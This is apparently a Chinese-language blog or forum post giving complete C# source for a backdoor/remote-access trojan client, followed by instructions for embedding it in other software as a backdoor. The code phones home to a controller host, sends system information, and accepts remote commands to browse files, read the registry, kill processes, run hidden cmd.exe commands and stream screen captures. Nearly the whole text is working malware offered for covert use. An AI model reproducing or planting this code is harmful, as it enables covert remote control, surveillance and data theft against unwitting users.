首先定義一個全局,上線地址,上線端口等 using Control_Client; using Microsoft.Win32; using System; using System.Collections.Generic; using System.Diagnostics; using System.Drawing; using System.IO; using System.Management; using System.Net; using System.Net.Sockets; using System.Text; using System.Threading; using System.Windows.Forms; class BD { public static TcpClient Client; public static TcpListener Lis; public static NetworkStream Stream; public static Socket socket; public static Socket Lis_socket; public static String LocalDisk_List = "$GetDir||"; //電腦盤符命令,初始化命令頭 public static String Online_Order = "$Online||"; //上線命令,初始化命令頭部 public static String Folder_List = "$GetFolder||"; //列舉子文件夾命令,初始化命令頭 public static String File_List = "$GetFile||"; //列舉文件命令,初始化命令頭 public static String Process_List = "$GetProcess||"; //列舉文件命令,初始化命令頭 public static String RegName_List = "$GetRegisterRoot||"; //列舉注冊表子項名命令,初始化命令頭 public static String RegNameValues_List = "$GetRegisterRootValues||"; //列舉注冊表子項值命令,初始化命令頭 public static String CMD_List = "$ActiveDos||"; //保存DOS命令執行后的結果 public static String Service_List = "$GetService||"; //保存系統服務列表 public static Process CMD = new Process(); //用於執行DOS命令 public static bool _IsStop_Catching_Desktop = false; //此標識為用於判斷是否停止對於屏幕的獲取 public static UdpClient UDP_Client = new UdpClient(); public delegate void Pt(); /// <summary> /// 此方法用於向主控端發送上線請求 /// 命令原型 : $Online||軟件版本||計算機名||客戶注釋||操作系統||CPU頻率||內存容量 /// </summary> public static void Post_Online_Message() { Client = new TcpClient(); //嘗試連接 Client.Connect(Globle.Host, Globle.Port); //如果連接上了 if (Client.Connected) { //得到套接字原型 socket = Client.Client; Stream = new NetworkStream(socket); //發送上線請求 Stream.Write(Encoding.Default.GetBytes(Online_Order), 0, Encoding.Default.GetBytes(Online_Order).Length); Stream.Flush(); //如果請求發出后套接字仍然處於連接狀態 //則單劈出一個線程,用於接收命令 if (socket.Connected) { Thread thread = new Thread(new ThreadStart(Get_Server_Order)); thread.Start(); } } } /// <summary> /// 此方法通過Windows WMI 服務 /// 進行計算機硬件軟件信息的收集 /// </summary> public static void Get_ComputerInfo() { //查詢計算機名 Online_Order += WMI_Searcher("SELECT * FROM Win32_ComputerSystem", "Caption") + "||"; //查詢備注 Online_Order += Globle.Customer + "||"; //查詢操作系統 Online_Order += WMI_Searcher("SELECT * FROM Win32_OperatingSystem", "Caption") + "||"; //查詢CPU Online_Order += WMI_Searcher("SELECT * FROM Win32_Processor", "Caption") + "||"; //查詢內存容量 - 單位: MB Online_Order += (int.Parse(WMI_Searcher("SELECT * FROM Win32_OperatingSystem", "TotalVisibleMemorySize")) / 1024) + " MB||"; } #region WMI 操作相關及擴展 /// <summary> /// 此方法根據指定語句通過WMI查詢用戶指定內容 /// 並且返回 /// </summary> /// <param name="QueryString"></param> /// <param name="Item_Name"></param> /// <returns></returns> public static String WMI_Searcher(String QueryString, String Item_Name) { String Result = ""; ManagementObjectSearcher MOS = new ManagementObjectSearcher(QueryString); ManagementObjectCollection MOC = MOS.Get(); foreach (ManagementObject MOB in MOC) { Result = MOB[Item_Name].ToString(); break; } MOC.Dispose(); MOS.Dispose(); return Result; } /// <summary> /// 此方法根據指定語句通過WMI查詢用戶指定內容 /// 並且返回 /// </summary> /// <param name="QueryString"></param> /// <param name="Item_Name"></param> /// <returns></returns> public static String WMI_Searcher_Service_Ex(String QueryString) { String Result = ""; ManagementObjectSearcher MOS = new ManagementObjectSearcher(QueryString); ManagementObjectCollection MOC = MOS.Get(); foreach (ManagementObject MOB in MOC) { try { Result += MOB["Caption"].ToString() + ","; if (MOB["Started"].ToString() == "True") { Result += "啟動中" + ","; } else { Result += "停止中" + ","; } Result += MOB["Description"].ToString() + "||"; } catch (Exception ex) { }; } MOC.Dispose(); MOS.Dispose(); return Result; } #endregion #region 命令處理函數 /// <summary> /// 此方法用於判斷命令結構 /// 根據不同的命令調用不同的方法進行處理 /// </summary> /// <param name="Order_Set"></param> public static void Order_Catcher(String[] Order_Set) { switch (Order_Set[0]) { //此命令頭表示客戶端狀態結果返回 case "$Return": switch (Order_Set[1]) { //如果是上線成功 case "#Online_OK": Online_OK(); break; } break; //此命令頭表示客戶端請求本機所有盤符 case "$GetDir": Get_LocalDisk(); break; //此命令頭表示客戶端請求本機指定目錄下的所有文件夾 case "$GetFolder": Get_Foloder(Order_Set[1]); break; //此命令頭表示客戶端請求本機指定目錄下的所有文件 case "$GetFile": Get_File(Order_Set[1]); break; //此命令頭表示客戶端請求本機當前所有進程 case "$GetProcess": Get_Process(); break; //此命令頭表示客戶端請求殺死本機指定進程 case "$KillProcess": Kill_Process(Order_Set[1]); break; //此命令頭表示客戶端請求列舉本地注冊表根目錄 case "$GetRegisterRoot": Get_RegRoot(Order_Set[1], Order_Set[2]); break; //此命令頭表示客戶端請求列舉本地注冊表指定項的所有值 case "$GetRegisterRootValues": Get_RegRootValues(Order_Set[1], Order_Set[2]); break; //此命令頭表示客戶端請求激活本地DOS case "$ActiveDos": ActiveDos(); break; //此命令頭表示客戶端請求執行本地DOS命令 case "$ExecuteCommand": Execute_Command(Order_Set[1]); break; //此命令頭表示客戶端請求列舉本機系統服務列表 case "$GetService": GetService(); break; //此命令頭表示客戶端請求激活本機屏幕HDC case "$ActiveHDC": try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { Ns.Write(Encoding.Default.GetBytes("$ActiveHDC||True"), 0, Encoding.Default.GetBytes("$ActiveHDC||True").Length); Ns.Flush(); } UDP_Client.Connect(Globle.Host, Globle.UDP_Port); //如果連接上了 if (UDP_Client.Client.Connected) { //新建線程進行發送桌面信息 //Thread thread = new Thread(new ThreadStart(Catching_Desktop)); //thread.Start(); // BeginInvoke(new Pt(Active_Timer)); } } catch (Exception ex) { MessageBox.Show("嘗試發送激活HDC信息失敗 : " + ex.Message); } break; } } #endregion #region 上線成功后操作函數 /// <summary> /// 此方法用於上線成功后的用戶提示 /// </summary> public static void Online_OK() { // Sys_Icon.ShowBalloonTip(5000, "上線成功", "成功連接到主控端!", ToolTipIcon.Info); } #endregion #region 窗體關閉動作 /// <summary> /// 此事件用於窗體關閉時消除所有正在運行的線程 /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void Main_Form_FormClosing(object sender, FormClosingEventArgs e) { //下線命令 原型 : $OffLine|| String Order = "$OffLine||"; try { //嘗試發送下線請求 Stream.Write(Encoding.Default.GetBytes(Order + ((IPEndPoint)socket.LocalEndPoint).Address.ToString()), 0, Encoding.Default.GetBytes(Order + ((IPEndPoint)socket.LocalEndPoint).Address.ToString()).Length); Stream.Flush(); } catch (Exception ex) { }; Environment.Exit(0); } #endregion #region 枚舉硬盤 - 監聽自身端口相關操作 /// <summary> /// 此方法調用Windows WMI /// 列舉當前電腦所有盤符 /// </summary> public static void Get_LocalDisk() { LocalDisk_List = "$GetDir||"; ManagementObjectSearcher MOS = new ManagementObjectSearcher("SELECT * FROM Win32_LogicalDisk"); ManagementObjectCollection MOC = MOS.Get(); foreach (ManagementObject MOB in MOC) { LocalDisk_List += MOB["Description"].ToString() + "#" + MOB["Caption"].ToString() + ","; } MOC.Dispose(); MOS.Dispose(); try { //得到硬盤分區列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { Ns.Write(Encoding.Default.GetBytes(LocalDisk_List), 0, Encoding.Default.GetBytes(LocalDisk_List).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發送硬盤分區列表失敗 : " + ex.Message); } } /// <summary> /// 此方法用於監聽上線端口 /// </summary> public static void Listen_Port() { while (Globle._IsListen_Port) { Lis_socket = Lis.AcceptSocket(); //如果有客戶端請求則創建套接字 Thread thread = new Thread(new ThreadStart(Res_Message)); thread.Start(); } } #endregion #region 文件夾 - 文件枚舉操作 /// <summary> /// 此方法用於根據指定盤符列舉子文件夾 /// </summary> /// <param name="Path"></param> public static void Get_Foloder(String Path) { Folder_List = "$GetFolder||"; //得到指定盤符的所有子文件夾 String[] Folder = Directory.GetDirectories(Path); for (int i = 0; i < Folder.Length; i++) { Folder_List += Folder[i] + ","; } try { //得到文件夾列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { Ns.Write(Encoding.Default.GetBytes(Folder_List), 0, Encoding.Default.GetBytes(Folder_List).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發送文件夾列表失敗 : " + ex.Message); } } /// <summary> /// 此方法用於根據指定盤符列舉子所有文件 /// </summary> /// <param name="Path"></param> public static void Get_File(String Path) { File_List = "$GetFile||"; //得到文件目標文件夾文件數組 String[] Result_List = Directory.GetFiles(Path); //通過拆分得到結果字符串 for (int i = 0; i < Result_List.Length; i++) { File_List += Result_List[i] + ","; } try { //得到文件列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { Ns.Write(Encoding.Default.GetBytes(File_List), 0, Encoding.Default.GetBytes(File_List).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發送文件夾列表失敗 : " + ex.Message); } } #endregion #region 循環接收命令機制 /// <summary> /// 此方法用於得到主控端發來的命令集合 /// </summary> public static void Get_Server_Order() { while (Globle._IsResvice_Message) { try { byte[] bb = new byte[1024]; //接收命令 int Order_Len = Stream.Read(bb, 0, bb.Length); //得到主控端發來的命令集合 String[] Order_Set = Encoding.Default.GetString(bb, 0, Order_Len).Split(new String[] { "||" }, StringSplitOptions.RemoveEmptyEntries); Order_Catcher(Order_Set); } catch (Exception ex) { }; } } /// <summary> /// 此方法負責接收主控端命令 /// 並且傳遞到處理方法種 /// </summary> public static void Res_Message() { while (Globle._IsResvice_Message) { try { using (NetworkStream ns = new NetworkStream(Lis_socket)) { try { byte[] bb = new byte[1024]; //得到命令 int Res_Len = ns.Read(bb, 0, bb.Length); //得到完整命令分割后的數組結構 String[] Order_Set = Encoding.Default.GetString(bb, 0, Res_Len).Split(new String[] { "||" }, StringSplitOptions.RemoveEmptyEntries); //調用判斷命令函數 //MessageBox.Show(Order_Set[0]); Order_Catcher(Order_Set); } catch (Exception ex) { }; } } catch (Exception ex) { }; } } #endregion #region 系統進程相關操作 /// <summary> /// 此方法負責列舉當前系統所有進程 /// 並且拼接結果字符串發送給主控端 /// </summary> public static void Get_Process() { Process_List = "$GetProcess||"; Process[] process = Process.GetProcesses(); for (int i = 0; i < process.Length; i++) { try { if (process[i].ProcessName != "") { //拼接字符串 Process_List += process[i].ProcessName + "," + process[i].Handle.ToString() + "," + process[i].Id + "||"; } } catch (Exception ex) { }; } try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { Ns.Write(Encoding.Default.GetBytes(Process_List), 0, Encoding.Default.GetBytes(Process_List).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發送進程列表失敗 : " + ex.Message); } } /// <summary> /// 此方法根據指定的進程名殺死進程 /// 如果結束進程成功 則返回 $KillProcess||True /// 否則返回 $KillProcess||False /// </summary> /// <param name="Process_Name"></param> public static void Kill_Process(String Process_Name) { bool isKilled = false; Process[] Process_Set = Process.GetProcesses(); //遍歷所有進程,找到指定進程后殺死 for (int i = 0; i < Process_Set.Length; i++) { try { if (Process_Set[i].ProcessName == Process_Name) { //如果找到進程則嘗試殺死該進程 Process_Set[i].Kill(); //殺死成功后 ,改變標志位,跳出FOR循環發送回應命令 isKilled = true; break; } } catch (Exception ex) { }; } //得到結果后判斷標志位 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { //如果成功殺死了 if (isKilled) { Ns.Write(Encoding.Default.GetBytes("$KillProcess||True"), 0, Encoding.Default.GetBytes("$KillProcess||True").Length); Ns.Flush(); } else { Ns.Write(Encoding.Default.GetBytes("$KillProcess||False"), 0, Encoding.Default.GetBytes("$KillProcess||False").Length); Ns.Flush(); } } } #endregion #region 注冊表操作相關 /// <summary> /// 此方法用於得到當前系統注冊表根目錄名字並且發送 /// </summary> public static void Get_RegRoot(String Key_Model, String Key_Path) { RegName_List = "$GetRegisterRoot||"; //新建數組結構體用來接收得到的子項名集合 String[] Reg_Name_Set = Get_Register_Root_Names(Key_Model, Key_Path); for (int i = 0; i < Reg_Name_Set.Length; i++) { //拼接結果字符串 RegName_List += Reg_Name_Set[i] + "||"; } try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { Ns.Write(Encoding.Default.GetBytes(RegName_List), 0, Encoding.Default.GetBytes(RegName_List).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發送注冊表子項列表失敗 : " + ex.Message); } } /// <summary> /// 此方法根據指定的注冊表項路徑 /// 查找所屬下的所有子項名稱 /// 並且返回數組名稱結構體 /// </summary> /// <param name="Key_Model"></param> /// <param name="Key_Path"></param> /// <returns></returns> public static String[] Get_Register_Root_Names(String Key_Model, String Key_Path) { //新建數組,用來儲存子項名字集合 String[] Names = null; //如果是檢索根鍵值 if (Key_Path == "******%None%******") { //判斷鍵值路徑所屬的根鍵 switch (Key_Model) { //如果是HKEY_CLASSES_ROOT下面的 case "HKEY_CLASSES_ROOT": Names = Registry.ClassesRoot.GetSubKeyNames(); break; //如果是HKEY_CURRENT_CONFIG下面的 case "HKEY_CURRENT_CONFIG": Names = Registry.CurrentConfig.GetSubKeyNames(); break; //如果是HKEY_CURRENT_USER下面的 case "HKEY_CURRENT_USER": Names = Registry.CurrentUser.GetSubKeyNames(); break; //如果是HKEY_LOCAL_MACHINE下面的 case "HKEY_LOCAL_MACHINE": Names = Registry.LocalMachine.GetSubKeyNames(); break; //如果是HKEY_USERS下面的 case "HKEY_USERS": Names = Registry.Users.GetSubKeyNames(); break; } } //如果是檢索根鍵值下面的子項 else { //判斷鍵值路徑所屬的根鍵 switch (Key_Model) { //如果是HKEY_CLASSES_ROOT下面的 case "HKEY_CLASSES_ROOT": Names = Registry.ClassesRoot.OpenSubKey(Key_Path).GetSubKeyNames(); break; //如果是HKEY_CURRENT_CONFIG下面的 case "HKEY_CURRENT_CONFIG": Names = Registry.CurrentConfig.OpenSubKey(Key_Path).GetSubKeyNames(); break; //如果是HKEY_CURRENT_USER下面的 case "HKEY_CURRENT_USER": Names = Registry.CurrentUser.OpenSubKey(Key_Path).GetSubKeyNames(); break; //如果是HKEY_LOCAL_MACHINE下面的 case "HKEY_LOCAL_MACHINE": Names = Registry.LocalMachine.OpenSubKey(Key_Path).GetSubKeyNames(); break; //如果是HKEY_USERS下面的 case "HKEY_USERS": Names = Registry.Users.OpenSubKey(Key_Path).GetSubKeyNames(); break; } } //返回目錄名集合 return Names; } /// <summary> /// 此方法用於得到當前系統注冊表根目錄子項所有值並且發送 /// </summary> public static void Get_RegRootValues(String Key_Model, String Key_Path) { RegNameValues_List = "$GetRegisterRootValues||"; //新建數組結構體用來接收得到的子項名集合 RegNameValues_List += Get_Register_Root_Values(Key_Model, Key_Path); try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { Ns.Write(Encoding.Default.GetBytes(RegNameValues_List), 0, Encoding.Default.GetBytes(RegNameValues_List).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發送注冊表子項值列表失敗 : " + ex.Message); } } /// <summary> /// 此方法根據指定的注冊表項路徑 /// 查找所屬下的所有值名稱 /// 並且返回數組名稱結構體 /// </summary> /// <param name="Key_Model"></param> /// <param name="Key_Path"></param> /// <returns></returns> public static String Get_Register_Root_Values(String Key_Model, String Key_Path) { //新建數組,用來儲存子項名字集合 String Result_List = ""; //如果是檢索根鍵值 if (Key_Path == "******%None%******") { //判斷鍵值路徑所屬的根鍵 switch (Key_Model) { //如果是HKEY_CLASSES_ROOT下面的 case "HKEY_CLASSES_ROOT": using (RegistryKey RK = Registry.ClassesRoot) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_CURRENT_CONFIG下面的 case "HKEY_CURRENT_CONFIG": using (RegistryKey RK = Registry.CurrentConfig) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_CURRENT_USER下面的 case "HKEY_CURRENT_USER": using (RegistryKey RK = Registry.CurrentUser) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_LOCAL_MACHINE下面的 case "HKEY_LOCAL_MACHINE": using (RegistryKey RK = Registry.LocalMachine) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_USERS下面的 case "HKEY_USERS": using (RegistryKey RK = Registry.Users) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; } } //如果是檢索根鍵值下面的子項 else { //判斷鍵值路徑所屬的根鍵 switch (Key_Model) { //如果是HKEY_CLASSES_ROOT下面的 case "HKEY_CLASSES_ROOT": using (RegistryKey RK = Registry.ClassesRoot.OpenSubKey(Key_Path)) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_CURRENT_CONFIG下面的 case "HKEY_CURRENT_CONFIG": using (RegistryKey RK = Registry.CurrentConfig.OpenSubKey(Key_Path)) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_CURRENT_USER下面的 case "HKEY_CURRENT_USER": using (RegistryKey RK = Registry.CurrentUser.OpenSubKey(Key_Path)) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_LOCAL_MACHINE下面的 case "HKEY_LOCAL_MACHINE": using (RegistryKey RK = Registry.LocalMachine.OpenSubKey(Key_Path)) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; //如果是HKEY_USERS下面的 case "HKEY_USERS": using (RegistryKey RK = Registry.Users.OpenSubKey(Key_Path)) { foreach (String VName in RK.GetValueNames()) { Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||"; } } break; } } //返回目錄名集合 return Result_List; } #endregion #region 系統DOS相關操作 /// <summary> /// 此方法用於激活本地DOS /// 首先查找是否存在DOS的可執行文件 /// 如果不存在則返回錯誤信息 /// 存在則返回DOS歡迎初始化信息 /// </summary> public static void ActiveDos() { //如果不存在文件 if (!File.Exists("C:\\Windows\\System32\\cmd.exe")) { try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { //DOS文件不存在命令 原型 : $ActiveDos|| [參數1] Ns.Write(Encoding.Default.GetBytes(CMD_List + "Error"), 0, Encoding.Default.GetBytes(CMD_List + "Error").Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發不存在DOS信息失敗 : " + ex.Message); } } //如果存在 else { String Result = Get_Message_Command(""); try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { //DOS文件存在命令 原型 : $ActiveDos|| 歡迎信息 Ns.Write(Encoding.Default.GetBytes(CMD_List + Result), 0, Encoding.Default.GetBytes(CMD_List + Result).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發不存在DOS信息失敗 : " + ex.Message); } } } /// <summary> /// 此方法用於獲得執行命令后的結果 /// 並發送給主控端 /// </summary> /// <param name="Order"></param> public static void Execute_Command(String Order) { String Result = "$ExecuteCommand||" + Get_Message_Command("/c " + Order); try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { //DOS文件存在命令 原型 : $ExecuteCommand || 命令執行結果 Ns.Write(Encoding.Default.GetBytes(Result), 0, Encoding.Default.GetBytes(Result).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發不存在DOS執行結果失敗 : " + ex.Message); } } /// <summary> /// 此方法用於將指定DOS命令執行后返回結果 /// </summary> /// <param name="Command"></param> /// <returns></returns> public static String Get_Message_Command(String Command) { CMD.StartInfo.FileName = "cmd.exe"; CMD.StartInfo.Arguments = Command; CMD.StartInfo.RedirectStandardError = true; CMD.StartInfo.RedirectStandardOutput = true; CMD.StartInfo.UseShellExecute = false; CMD.StartInfo.CreateNoWindow = true; CMD.Start(); String Message_Line = ""; String Result = ""; using (StreamReader Reader = CMD.StandardOutput) { //循環讀取結果 while ((Message_Line = Reader.ReadLine()) != null) { Result += Message_Line + "\n"; } } return Result; } #endregion #region 系統服務相關操作 /// <summary> /// 此服務用於將得到的所有系統服務列表 /// 發送到主控端 /// </summary> public static void GetService() { String Result_List = Service_List + WMI_Searcher_Service_Ex("SELECT * FROM Win32_Service"); try { //得到進程列表后,嘗試發送 using (NetworkStream Ns = new NetworkStream(Lis_socket)) { //DOS文件存在命令 原型 : $ExecuteCommand || 命令執行結果 Ns.Write(Encoding.Default.GetBytes(Result_List), 0, Encoding.Default.GetBytes(Result_List).Length); Ns.Flush(); } } catch (Exception ex) { MessageBox.Show("嘗試發系統服務列表失敗 : " + ex.Message); } } #endregion #region 遠程桌面監控相關操作 /// <summary> /// 此方法用於根據標志位不停的抓取屏幕圖像 /// 並且傳送給主控端 /// </summary> public static void Catching_Desktop() { while (!_IsStop_Catching_Desktop) { //創建一個跟屏幕大小一樣的Image Image img = new Bitmap(Screen.AllScreens[0].Bounds.Width, Screen.AllScreens[0].Bounds.Height); //創建GDI+ 用來DRAW屏幕 Graphics g = Graphics.FromImage(img); //將屏幕打入到Image中 g.CopyFromScreen(new Point(0, 0), new Point(0, 0), Screen.AllScreens[0].Bounds.Size); //得到屏幕HDC句柄 IntPtr HDC = g.GetHdc(); //截圖后釋放該句柄 g.ReleaseHdc(HDC); MemoryStream Ms = new MemoryStream(); //將圖像打入流 img.Save(Ms, System.Drawing.Imaging.ImageFormat.Jpeg); Send_Desktop_Image_Info(Ms); } } public static void Send_Desktop_Image_Info(MemoryStream Ms) { int Len = 0; byte[] bb = new byte[4096]; Ms.Position = 0; while ((Len = Ms.Read(bb, 0, bb.Length)) > 0) { UDP_Client.Send(bb, bb.Length); } //發送結尾符 UDP_Client.Send(Encoding.Default.GetBytes("**End**"), Encoding.Default.GetBytes("**End**").Length); } private void Desktop_Timer_Tick(object sender, EventArgs e) { if (!_IsStop_Catching_Desktop) { //創建一個跟屏幕大小一樣的Image Image img = new Bitmap(Screen.AllScreens[0].Bounds.Width, Screen.AllScreens[0].Bounds.Height); //創建GDI+ 用來DRAW屏幕 Graphics g = Graphics.FromImage(img); //將屏幕打入到Image中 g.CopyFromScreen(new Point(0, 0), new Point(0, 0), Screen.AllScreens[0].Bounds.Size); //得到屏幕HDC句柄 IntPtr HDC = g.GetHdc(); //截圖后釋放該句柄 g.ReleaseHdc(HDC); MemoryStream Ms = new MemoryStream(); //將圖像打入流 img.Save(Ms, System.Drawing.Imaging.ImageFormat.Jpeg); Send_Desktop_Image_Info(Ms); } } /// <summary> /// 此方法用於將TIMER啟動 /// 調用方式 : [委托] /// </summary> public static void Active_Timer() { // Desktop_Timer.Enabled = true; } #endregion }
直接在軟件中做為后門的使用辦法:
BD.Online_Order += Globle.Software + "||"; //調用WMI收集系統信息 BD.Get_ComputerInfo(); //發送上線請求 - [多線程] Thread thread = new Thread(new ThreadStart(BD.Post_Online_Message)); thread.Start(); //自身監聽端口 - [多線程] BD.Lis = new TcpListener(Globle.Lis_Port); BD.Lis.Start(); //一直監聽 Thread thread_Lis_MySelf = new Thread(new ThreadStart(BD.Listen_Port)); thread_Lis_MySelf.Start();
這樣就啟動了。